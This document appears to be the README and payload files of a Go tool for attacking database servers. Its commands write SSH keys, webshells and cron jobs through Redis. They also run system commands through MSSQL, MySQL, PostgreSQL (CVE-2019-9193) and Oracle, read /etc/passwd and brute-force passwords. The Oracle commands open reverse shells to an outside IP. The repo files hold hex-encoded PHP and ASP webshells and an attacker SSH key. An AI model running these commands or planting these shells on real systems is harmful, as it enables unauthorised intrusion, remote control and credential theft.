![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673169147330-646d29f4-b9f5-43f7-bec9-f455d204ee99.png#averageHue=%232c2c2c&clientId=u67188ca8-ad41-4&from=paste&height=263&id=ubf42c5a7&name=image.png&originHeight=395&originWidth=1540&originalType=binary&ratio=1&rotation=0&showTitle=false&size=56558&status=done&style=none&taskId=u3c8fa367-3e93-498a-9223-fc0b4576281&title=&width=1026.6666666666667) 19 | ### 写公钥 20 | 将ssh.txt文件中公钥替换成自己生成的 21 | ```shell 22 | go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -sshkey 23 | ``` 24 | ### 写Webshell 25 | ```shell 26 | go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -shell 27 | ``` 28 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673172455308-4d7d1f2b-25ec-4ff2-9002-37a951006a64.png#averageHue=%232c2c2c&clientId=u4db9b2af-90c3-4&from=paste&height=637&id=ue060e558&name=image.png&originHeight=956&originWidth=1678&originalType=binary&ratio=1&rotation=0&showTitle=false&size=151014&status=done&style=none&taskId=u9d4fbe22-3293-4f4c-9d0c-3c53c03d080&title=&width=1118.6666666666667) 29 | ### 定时任务 30 | 需要修改crontab.txt内容 31 | ```shell 32 | go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -crontab 33 | ``` 34 | ## MSSQL 35 | ### 连接数据库并获取一个sql shell 36 | ```shell 37 | go run .\main.go -mssql -rhost 192.168.111.223 -rport 1433 -ruser sa -pwd "1qaz@WSX" -cli 38 | ``` 39 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1675177766048-6b3b73c8-78d4-4e09-b9ff-de880da2d1d4.png#averageHue=%232d2d2c&clientId=uf3dc0733-6a37-4&from=paste&height=357&id=u24708bb9&name=image.png&originHeight=536&originWidth=1769&originalType=binary&ratio=1&rotation=0&showTitle=false&size=112663&status=done&style=none&taskId=u50b40e50-727f-42ee-91e5-c0979786901&title=&width=1179.3333333333333) 40 | ### 开启xp_cmdshell 41 | ```shell 42 | go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp 43 | ``` 44 | 
![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673028201084-80b53f0e-8e02-4263-8f06-f24776514701.png#averageHue=%232e2d2c&clientId=u08da9ee0-8226-4&from=paste&height=307&id=udc10c4d2&name=image.png&originHeight=461&originWidth=1819&originalType=binary&ratio=1&rotation=0&showTitle=false&size=106608&status=done&style=none&taskId=u8199fc07-72ea-4c05-b76f-92c07ea77f2&title=&width=1212.6666666666667) 45 | ### xp_cmdshell获取一个执行系统命令的shell 46 | ```shell 47 | go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp -console 48 | ``` 49 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673028316198-6dc5a19d-4c93-4d62-aef4-80f027530067.png#averageHue=%232d2d2c&clientId=u08da9ee0-8226-4&from=paste&height=276&id=ucb4936fc&name=image.png&originHeight=414&originWidth=1591&originalType=binary&ratio=1&rotation=0&showTitle=false&size=89465&status=done&style=none&taskId=ud51186ff-df6b-4166-9347-f5c0c4d2e1c&title=&width=1060.6666666666667) 50 | ### xp_cmdshell执行单条系统命令 51 | ```shell 52 | go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp -docmd -cmd "whoami" 53 | ``` 54 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673028373704-771c27d7-1c70-4359-818f-f5ee934c03fc.png#averageHue=%232d2d2c&clientId=u08da9ee0-8226-4&from=paste&height=259&id=uf0957005&name=image.png&originHeight=389&originWidth=1786&originalType=binary&ratio=1&rotation=0&showTitle=false&size=86227&status=done&style=none&taskId=u164f0020-29d3-40a2-a39a-b1dae0192d2&title=&width=1190.6666666666667) 55 | ### 开启sp_oacreate 56 | ```shell 57 | go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp 58 | ``` 59 | 
![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673028504490-a80fce4f-dec8-45ed-bf1d-cb8ddada1bf9.png#averageHue=%232e2d2c&clientId=u08da9ee0-8226-4&from=paste&height=264&id=u43df7f3c&name=image.png&originHeight=396&originWidth=1918&originalType=binary&ratio=1&rotation=0&showTitle=false&size=103785&status=done&style=none&taskId=u5cc1b732-ac3e-4e06-b1a9-21d318445ea&title=&width=1278.6666666666667) 60 | ### sp_oacreate获取一个执行系统命令的shell 61 | ```shell 62 | go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp -console 63 | ``` 64 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673028597527-1f4a86ad-f2e3-474f-bc14-1b72d99b2509.png#averageHue=%232d2c2c&clientId=u08da9ee0-8226-4&from=paste&height=471&id=ub3f49863&name=image.png&originHeight=707&originWidth=2232&originalType=binary&ratio=1&rotation=0&showTitle=false&size=159682&status=done&style=none&taskId=uf13f8f08-71a6-4091-8f2a-cde092c92f1&title=&width=1488) 65 | ### sp_oacreate执行单条系统命令 66 | ```shell 67 | go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp -docmd -cmd "whoami" 68 | ``` 69 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673028782184-2beee226-5d8a-449f-aac8-f92ffba184d7.png#averageHue=%232d2c2c&clientId=u08da9ee0-8226-4&from=paste&height=421&id=u56eedfb9&name=image.png&originHeight=632&originWidth=2319&originalType=binary&ratio=1&rotation=0&showTitle=false&size=146388&status=done&style=none&taskId=u408d7e26-3620-47ab-82de-2c641f0c855&title=&width=1546) 70 | ### CLR获取一个执行系统命令的shell 71 | ```shell 72 | go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isclr -console 73 | ``` 74 | 
![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673029296087-5b97dcab-b004-4e78-9477-7ae2d9079867.png#averageHue=%232d2d2c&clientId=u08da9ee0-8226-4&from=paste&height=438&id=u9b24b4c0&name=image.png&originHeight=657&originWidth=1832&originalType=binary&ratio=1&rotation=0&showTitle=false&size=142685&status=done&style=none&taskId=ua7222524-b6ac-44d8-833d-b9ce6134d74&title=&width=1221.3333333333333) 75 | ### CLR执行单条系统命令 76 | ```shell 77 | go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isclr -docmd -cmd "whoami" 78 | ``` 79 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673029487512-084efe55-dff3-46fd-a2bd-ee4c15bc0408.png#averageHue=%232d2d2c&clientId=u08da9ee0-8226-4&from=paste&height=395&id=u28f01cec&name=image.png&originHeight=592&originWidth=1827&originalType=binary&ratio=1&rotation=0&showTitle=false&size=137314&status=done&style=none&taskId=u1fe330da-bef3-433f-b6e6-058b30d7f7e&title=&width=1218) 80 | ### log备份写getshell 81 | ```shell 82 | go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -shell -logshell -path "C:\phpStudy\WWW\aa.php" -e 'php' 83 | ``` 84 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673029630310-7157f5fd-a6d1-4180-a2ab-82365975599a.png#averageHue=%232d2c2c&clientId=u08da9ee0-8226-4&from=paste&height=376&id=u99c99882&name=image.png&originHeight=564&originWidth=2156&originalType=binary&ratio=1&rotation=0&showTitle=false&size=138324&status=done&style=none&taskId=u57002ca6-f2e2-4fe4-927b-55b6f1e8c54&title=&width=1437.3333333333333) 85 | ### 差异备份getshell 86 | 87 | ```shell 88 | go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -difshell -path "C:\phpStudy\WWW\shell.php" -e 'php' 89 | ``` 90 | 
![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673029787485-9fd603ad-2644-4d3e-85ca-0995f620b4eb.png#averageHue=%232d2c2c&clientId=u08da9ee0-8226-4&from=paste&height=335&id=u548fd650&name=image.png&originHeight=502&originWidth=2102&originalType=binary&ratio=1&rotation=0&showTitle=false&size=121883&status=done&style=none&taskId=udec3fc47-ddfc-4d5b-9628-8e351de57c0&title=&width=1401.3333333333333) 91 | ## SSH连接 92 | ```shell 93 | go run .\main.go -ssh -ruser root -rhost 192.168.111.139 -pwd "1qaz@WSX" 94 | ``` 95 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673030022732-c37f6580-12e8-4262-861e-936263fdf94d.png#averageHue=%232c2c2b&clientId=u08da9ee0-8226-4&from=paste&height=463&id=ua7a42f48&name=image.png&originHeight=694&originWidth=1811&originalType=binary&ratio=1&rotation=0&showTitle=false&size=103526&status=done&style=none&taskId=uada5ae58-8e86-44dd-af4f-6e631ae5dfe&title=&width=1207.3333333333333) 96 | ## Mysql 97 | ### 连接获取sql shell 98 | ```shell 99 | go run .\main.go -mysql -ruser root -rhost 192.168.111.134 -pwd "root" -rport 3306 -cli 100 | ``` 101 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673030365697-3c1c72c2-fe1b-43ce-89ac-06feac0548b5.png#averageHue=%232c2b2b&clientId=u08da9ee0-8226-4&from=paste&height=238&id=u7c6e2300&name=image.png&originHeight=357&originWidth=1676&originalType=binary&ratio=1&rotation=0&showTitle=false&size=45044&status=done&style=none&taskId=ub8d468ed-b2e8-4cd8-8c3e-8d2143dcdb7&title=&width=1117.3333333333333) 102 | ### into out file获取webshell 103 | ```shell 104 | go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -shell -outfileshell -path "C:\\\\phpStudy\\\\WWW\\\\\aaa.php" 105 | ``` 106 | 
![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673030645785-1b594344-6002-410a-921d-f8efc3901bb2.png#averageHue=%232d2d2c&clientId=u08da9ee0-8226-4&from=paste&height=293&id=u4f764585&name=image.png&originHeight=439&originWidth=2476&originalType=binary&ratio=1&rotation=0&showTitle=false&size=117107&status=done&style=none&taskId=ub72efd5b-a58d-4cfc-b02a-7408b84a0cb&title=&width=1650.6666666666667) 107 | ### 全局日志getshell 108 | ```shell 109 | go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -shell -generallog -path C:\\\\phpStudy\\\\WWW\\\\aam.php 110 | ``` 111 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673030756036-47074c66-a11d-4019-adfc-4ac3727659b5.png#averageHue=%232c2c2b&clientId=u08da9ee0-8226-4&from=paste&height=269&id=udb7af4ba&name=image.png&originHeight=403&originWidth=2296&originalType=binary&ratio=1&rotation=0&showTitle=false&size=87296&status=done&style=none&taskId=uaf8c1a39-31a0-49f4-8524-40873034fec&title=&width=1530.6666666666667) 112 | ### udf提权 113 | ```shell 114 | go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -udf 115 | ``` 116 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673031307685-e3ce68e6-73f8-40eb-9297-51ab60415098.png#averageHue=%232d2c2c&clientId=u08da9ee0-8226-4&from=paste&height=512&id=uc2bcd055&name=image.png&originHeight=768&originWidth=1732&originalType=binary&ratio=1&rotation=0&showTitle=false&size=155085&status=done&style=none&taskId=ud0b58534-3ee7-4879-82e5-205a25f2ff1&title=&width=1154.6666666666667) 117 | ## postgresql 118 | ### 连接postgre数据库获取sql shell 119 | ```shell 120 | go run main.go -postgre -ruser "postgres" -pwd "postgres" -rhost 192.168.111.162 -rport "5432" -cli 121 | ``` 122 | 
![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673160848120-fd598941-e7a8-456f-bb5b-c41bdeaecc93.png#averageHue=%232d2d2c&clientId=u67188ca8-ad41-4&from=paste&height=307&id=u56542eca&name=image.png&originHeight=460&originWidth=2071&originalType=binary&ratio=1&rotation=0&showTitle=false&size=107639&status=done&style=none&taskId=u881db7a3-6cf0-4448-924e-ed59a618da9&title=&width=1380.6666666666667) 123 | ### 利用CVE-2019-9193循环执行命令 124 | ```shell 125 | go run main.go -postgre -ruser "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -CVE20199193 -console 126 | ``` 127 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673160917125-06586a4d-3256-42e9-9956-db1e36ca7b8d.png#averageHue=%232d2d2c&clientId=u67188ca8-ad41-4&from=paste&height=336&id=uf546e084&name=image.png&originHeight=504&originWidth=2019&originalType=binary&ratio=1&rotation=0&showTitle=false&size=126344&status=done&style=none&taskId=u9e7e6f41-650e-432e-839c-6612b81b65c&title=&width=1346) 128 | ### 利用CVE-2019-9193执行单条命令 129 | ```shell 130 | go run main.go -postgre -ruser "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -CVE20199193 -cmd "pwd" 131 | ``` 132 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673161033085-4ab426eb-558c-47b9-a5d0-a4b29098b69e.png#averageHue=%232d2d2c&clientId=u67188ca8-ad41-4&from=paste&height=265&id=uced0c31e&name=image.png&originHeight=398&originWidth=2105&originalType=binary&ratio=1&rotation=0&showTitle=false&size=109865&status=done&style=none&taskId=u86817218-9b22-4ac6-a084-8bc69b2a101&title=&width=1403.3333333333333) 133 | ### 单次文件读取(方法一) 134 | ```shell 135 | go run main.go -postgre -ruser "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read1 -file "/etc/passwd" 136 | ``` 137 | 
![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673161149239-1f78ce81-d03d-42ec-8d0e-0bd4649ecd62.png#averageHue=%232d2c2c&clientId=u67188ca8-ad41-4&from=paste&height=680&id=u8e990df0&name=image.png&originHeight=1020&originWidth=2190&originalType=binary&ratio=1&rotation=0&showTitle=false&size=210671&status=done&style=none&taskId=u63e87976-5a9f-439c-adb3-5414fc68dbf&title=&width=1460) 138 | ### 循环文件读取(方法一) 139 | ```shell 140 | go run main.go -postgre -ruser "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read1 -console 141 | ``` 142 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673161239356-65b45cb0-3f97-44f4-83e6-dc937a835dff.png#averageHue=%232d2c2c&clientId=u67188ca8-ad41-4&from=paste&height=719&id=u195ced09&name=image.png&originHeight=1078&originWidth=2235&originalType=binary&ratio=1&rotation=0&showTitle=false&size=226870&status=done&style=none&taskId=u866bcede-0111-422c-85d7-ae027662f44&title=&width=1490) 143 | ### 单次文件读取(方法二) 144 | ```shell 145 | go run main.go -postgre -ruser "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read2 -file "/etc/passwd" 146 | ``` 147 | 把hex值转换string即为结果 148 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673161361614-52b060b2-f9cb-4344-ab9b-15fef9b73d87.png#averageHue=%23302f2e&clientId=u67188ca8-ad41-4&from=paste&height=568&id=ud5083910&name=image.png&originHeight=852&originWidth=2492&originalType=binary&ratio=1&rotation=0&showTitle=false&size=222519&status=done&style=none&taskId=ua2ef94f7-6c84-430f-900f-bd6915af25d&title=&width=1661.3333333333333) 149 | ### 循环文件读取(方法二) 150 | ```shell 151 | go run main.go -postgre -ruser "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read2 -console 152 | ``` 153 | 
![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673161442923-657ff922-0990-4071-84ad-0a1e3cab1409.png#averageHue=%23302f2e&clientId=u67188ca8-ad41-4&from=paste&height=598&id=uccac852c&name=image.png&originHeight=897&originWidth=2474&originalType=binary&ratio=1&rotation=0&showTitle=false&size=230880&status=done&style=none&taskId=u236bbaee-3851-40d5-ae81-aa2c5d75e03&title=&width=1649.3333333333333) 154 | ### 列目录 155 | ```shell 156 | go run main.go -postgre -ruser "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -list -file "./" 157 | ``` 158 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673161496940-22009d1c-0290-4448-8cdf-ae6b161753d6.png#averageHue=%232c2b2b&clientId=u67188ca8-ad41-4&from=paste&height=661&id=u894f9629&name=image.png&originHeight=991&originWidth=2314&originalType=binary&ratio=1&rotation=0&showTitle=false&size=134912&status=done&style=none&taskId=u2101e801-9ce2-46f9-9eac-8eb0ca8d57d&title=&width=1542.6666666666667) 159 | ### 循环列目录 160 | ```shell 161 | go run main.go -postgre -ruser "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -list -console 162 | ``` 163 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673161555557-09ef072c-6942-4851-9d13-98c41f0551e1.png#averageHue=%232c2b2b&clientId=u67188ca8-ad41-4&from=paste&height=747&id=u3fe96a4b&name=image.png&originHeight=1121&originWidth=2302&originalType=binary&ratio=1&rotation=0&showTitle=false&size=151516&status=done&style=none&taskId=udee2f48a-0781-4199-8b99-3ef9c866556&title=&width=1534.6666666666667) 164 | ### 上传webshell 165 | ```shell 166 | go run main.go -postgre -ruser "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -write -uploadpath "/tmp/shell.jsp" -e "jsp" 167 | ``` 168 | 
![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673161636103-34acc8f7-e097-4452-8e7c-4de12bbc4d70.png#averageHue=%232e2d2c&clientId=u67188ca8-ad41-4&from=paste&height=222&id=uaa70f9de&name=image.png&originHeight=333&originWidth=2230&originalType=binary&ratio=1&rotation=0&showTitle=false&size=95815&status=done&style=none&taskId=u71252157-f05e-4b2b-9209-e57a8af5b27&title=&width=1486.6666666666667) 169 | ## Oracle 170 | 使用之前需要安装oracle客户端 171 | Windows下安装方法 172 | 解压下载的instantclient_21_8压缩包,将解压路径添加到系统变量path 173 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673773289868-162dccdc-7921-411e-af11-64544ccbef02.png#averageHue=%23f4f3f3&clientId=u5d6a75f5-9ab0-4&from=paste&height=517&id=u5303451a&name=image.png&originHeight=775&originWidth=805&originalType=binary&ratio=1&rotation=0&showTitle=false&size=43600&status=done&style=none&taskId=u2f1ad378-696d-4c46-8e50-b6e9c1fd3ec&title=&width=536.6666666666666) 174 | Linux下正常支持Redis、Mysql、SQL Server、Postgresql,如想使用Oracle功能需要安装Oracle客户端驱动。在Kali下所有功能可完美运行 175 | ### 获取sql shell 176 | ```shell 177 | go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser test -pwd "1qaz@WSX" -sid helowin -cli 178 | ``` 179 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673429766059-8e2694dc-45e6-4831-bf09-46e47c1fde9e.png#averageHue=%232d2c2c&clientId=uc11344e2-a856-4&from=paste&height=244&id=u40101f1d&name=image.png&originHeight=366&originWidth=2338&originalType=binary&ratio=1&rotation=0&showTitle=false&size=87190&status=done&style=none&taskId=u7a07727f-1939-468d-944c-6c7385e2735&title=&width=1558.6666666666667) 180 | ### DBMS_Export_Extension循环执行命令 181 | ```shell 182 | go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dee -console 183 | ``` 184 | 
![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673623715612-8428c8a4-9c1a-4efe-be9a-cafe5f1fd94d.png#averageHue=%232c2c2b&clientId=ucbc34b69-4b9d-4&from=paste&height=331&id=u80060969&name=image.png&originHeight=496&originWidth=2300&originalType=binary&ratio=1&rotation=0&showTitle=false&size=91240&status=done&style=none&taskId=u687dcb39-23a8-4567-af69-305fdd630e8&title=&width=1533.3333333333333) 185 | ### DBMS_Export_Extension执行单条命令 186 | ```shell 187 | go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dee -docmd -cmd "whoami" 188 | ``` 189 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673623778177-7653f045-c758-4026-a40a-092c35df1d8a.png#averageHue=%232d2c2c&clientId=ucbc34b69-4b9d-4&from=paste&height=192&id=u98a61877&name=image.png&originHeight=288&originWidth=2351&originalType=binary&ratio=1&rotation=0&showTitle=false&size=70891&status=done&style=none&taskId=uf0fb5e73-b82c-4db2-8bd3-d6425c7bf2c&title=&width=1567.3333333333333) 190 | ### DBMS_Export_Extension反弹shell 191 | ```shell 192 | go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -lhost 175.178.233.198 -lport 7776 -dee -re 193 | ``` 194 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673623842582-d0b94370-e3b0-49fa-ba62-47f8eb4d580e.png#averageHue=%232d2d2c&clientId=ucbc34b69-4b9d-4&from=paste&height=145&id=u7b0096c1&name=image.png&originHeight=218&originWidth=2245&originalType=binary&ratio=1&rotation=0&showTitle=false&size=62363&status=done&style=none&taskId=u9f895e81-de70-4f46-bec8-4efd8325a67&title=&width=1496.6666666666667) 195 | 
![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673623859445-d8046463-699e-4655-89fe-995233d94ecc.png#averageHue=%231c3345&clientId=ucbc34b69-4b9d-4&from=paste&height=121&id=uc775ec0e&name=image.png&originHeight=181&originWidth=912&originalType=binary&ratio=1&rotation=0&showTitle=false&size=153479&status=done&style=none&taskId=ubcddcba3-563a-417f-9bad-cdf5d097250&title=&width=608) 196 | ### DBMS_XMLQUERY循环执行系统命令 197 | ```shell 198 | go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dx -console 199 | ``` 200 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673623939528-8eba3e38-34b9-4e52-8799-bb3d1509fa5e.png#averageHue=%232d2c2c&clientId=ucbc34b69-4b9d-4&from=paste&height=359&id=u95d5e0ce&name=image.png&originHeight=539&originWidth=2247&originalType=binary&ratio=1&rotation=0&showTitle=false&size=112317&status=done&style=none&taskId=u5f887f71-3333-4988-8d50-67663f3ba69&title=&width=1498) 201 | ### DBMS_XMLQUERY执行单条系统命令 202 | ```shell 203 | go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dx -docmd -cmd "whoami" 204 | ``` 205 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673624066692-d9d54ab0-7d3b-46c1-9a23-5456373d928d.png#averageHue=%232d2c2c&clientId=ucbc34b69-4b9d-4&from=paste&height=244&id=ud170fc40&name=image.png&originHeight=366&originWidth=2351&originalType=binary&ratio=1&rotation=0&showTitle=false&size=88999&status=done&style=none&taskId=u4e1a65c9-08aa-4c34-883f-4af769e6da2&title=&width=1567.3333333333333) 206 | ### 卸载命令执行函数 207 | ```shell 208 | go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -del 209 | ``` 210 | 
![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673624027931-10678763-bf42-472a-a91d-e640b3c1555f.png#averageHue=%232d2c2c&clientId=ucbc34b69-4b9d-4&from=paste&height=185&id=u230a0fb8&name=image.png&originHeight=277&originWidth=2261&originalType=binary&ratio=1&rotation=0&showTitle=false&size=68992&status=done&style=none&taskId=u517c2117-9036-4b39-a465-b569c694f44&title=&width=1507.3333333333333) 211 | ### **dbms_java_test.funcall反弹shell** 212 | ```shell 213 | go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -lhost 175.178.233.198 -lport 7776 -fc 214 | ``` 215 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673624130369-ef91ff5e-7b6d-426d-9a4d-a195c4da0a32.png#averageHue=%232d2d2c&clientId=ucbc34b69-4b9d-4&from=paste&height=203&id=u7976a237&name=image.png&originHeight=304&originWidth=2287&originalType=binary&ratio=1&rotation=0&showTitle=false&size=88970&status=done&style=none&taskId=u8c491d7c-1038-46ac-b415-fbf388a9431&title=&width=1524.6666666666667) 216 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673624155908-1da47b35-40eb-4b39-abc6-0aead14e962b.png#averageHue=%231e3648&clientId=ucbc34b69-4b9d-4&from=paste&height=117&id=uae5a3a14&name=image.png&originHeight=176&originWidth=1204&originalType=binary&ratio=1&rotation=0&showTitle=false&size=188379&status=done&style=none&taskId=ua91bf8ed-063e-4f7f-8ebd-1222742f0ae&title=&width=802.6666666666666) 217 | ## 爆破数据库账号密码 218 | ### Mysql 219 | ``` 220 | go run .\main.go -rhost 192.168.111.206 -rport 3306 -crack -m mysql 221 | ``` 222 | 
![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1675176813163-edc698cf-4d8d-4ecd-b459-e6c3951d08a2.png#averageHue=%232d2c2c&clientId=uf3dc0733-6a37-4&from=paste&height=153&id=u8d9a68c6&name=image.png&originHeight=230&originWidth=1665&originalType=binary&ratio=1&rotation=0&showTitle=false&size=51404&status=done&style=none&taskId=ud314a94b-753a-4325-bc31-c21e484e977&title=&width=1110) 223 | ### MSSQL 224 | ```shell 225 | go run .\main.go -rhost 192.168.111.223 -rport 1433 -crack -m mssql 226 | ``` 227 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1675183775890-0845515d-5a4c-475c-a28f-6e9bb6ea385e.png#averageHue=%232c2c2b&clientId=uf3dc0733-6a37-4&from=paste&height=483&id=u6fe135f5&name=image.png&originHeight=725&originWidth=1634&originalType=binary&ratio=1&rotation=0&showTitle=false&size=141874&status=done&style=none&taskId=u0c8a6358-73a1-4a28-bf17-88a87d4b93f&title=&width=1089.3333333333333) 228 | ### Postgresql 229 | ```shell 230 | go run .\main.go -rhost 192.168.111.211 -rport 5432 -crack -m postgresql 231 | ``` 232 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1675183814719-c9714b53-1246-46f7-badd-da2ab5a4a829.png#averageHue=%232d2c2c&clientId=uf3dc0733-6a37-4&from=paste&height=751&id=u2a5aedcc&name=image.png&originHeight=1126&originWidth=1606&originalType=binary&ratio=1&rotation=0&showTitle=false&size=264923&status=done&style=none&taskId=u52ab6436-8908-4822-b0fd-ebc06ed4f59&title=&width=1070.6666666666667) 233 | ### Redis 234 | ```shell 235 | go run .\main.go -rhost 192.168.111.211 -rport 6379 -crack -m redis 236 | ``` 237 | 
![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1675183848971-060694b2-5666-436a-abd8-738254a1ba1e.png#averageHue=%232f2e2d&clientId=uf3dc0733-6a37-4&from=paste&height=49&id=u86edd1aa&name=image.png&originHeight=74&originWidth=1538&originalType=binary&ratio=1&rotation=0&showTitle=false&size=23762&status=done&style=none&taskId=ubc61896d-0d4f-46f8-bfb9-bc38cb89d95&title=&width=1025.3333333333333) 238 | ### Oracle 239 | ```shell 240 | go run .\main.go -rhost 192.168.111.211 -rport 1521 -crack -m oracle 241 | ``` 242 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1675183934258-2ace77e2-b03f-4f51-8bb4-ab63ffb85793.png#averageHue=%232d2c2c&clientId=uf3dc0733-6a37-4&from=paste&height=209&id=ud7226210&name=image.png&originHeight=314&originWidth=2233&originalType=binary&ratio=1&rotation=0&showTitle=false&size=83538&status=done&style=none&taskId=u42e7626e-4bf4-40b8-8f42-895a951d6ac&title=&width=1488.6666666666667) 243 | -------------------------------------------------------------------------------- /shell.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /shell/shell.asp: -------------------------------------------------------------------------------- 1 | 0x3c2520526573706f6e73652e43686172536574203d20225554462d3822200a6b3d2265343565333239666562356439323562220a53657373696f6e28226b22293d6b0a73697a653d526571756573742e546f74616c42797465730a636f6e74656e743d526571756573742e42696e617279526561642873697a65290a466f7220693d3120546f2073697a650a726573756c743d726573756c74264368722861736362286d69646228636f6e74656e742c692c31292920586f7220417363284d6964286b2c286920616e64203135292b312c312929290a4e6578740a6578656375746528726573756c74290a253e -------------------------------------------------------------------------------- /shell/shell.aspx: -------------------------------------------------------------------------------- 1 | 
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 -------------------------------------------------------------------------------- /shell/shell.jsp: -------------------------------------------------------------------------------- 1 | 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 -------------------------------------------------------------------------------- /shell/shell.php: -------------------------------------------------------------------------------- 1 | 0x3c3f70687020406576616c28245f504f53545b785d293b3f3e -------------------------------------------------------------------------------- /ssh.txt: -------------------------------------------------------------------------------- 1 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDINXK+mL26T6i5GG9WN7gNZ0CP241+R2Tb3kY+tzpdLovd9GoOkadd16ruNjE5cXOWrSdN9l/Md7ylP00md9lWKFC15Zf7TfkIXtsYg/9fIV1+1YmyUYhbSTNAp3GGYHQxM/YUdnvUW1F1btRemE5VRjEdK/pC+5Q81vCLmzKdQKe4ksVS5rI0iz2pDDZmO 2 | fa3OROAfXrbm79yn45mODPxUoePsy2XbacNQ3gINqvRkQyXUovYoK4wyxUFkBD6Fu+YpYTJhb4sDayomCApxgPHfWU2B2bMkT5evYsptNFC9P4EUzc7n04IQIN4Vja/OL/ICVBj9OgqGKX10p2QG6Krq1Z/He3mOcnFGv/HuyncARoftYxAP+6682U+t9OMVayPTqgE/TbenTh0gkZwO4xZW8BQJDxp0CRqCm 3 | 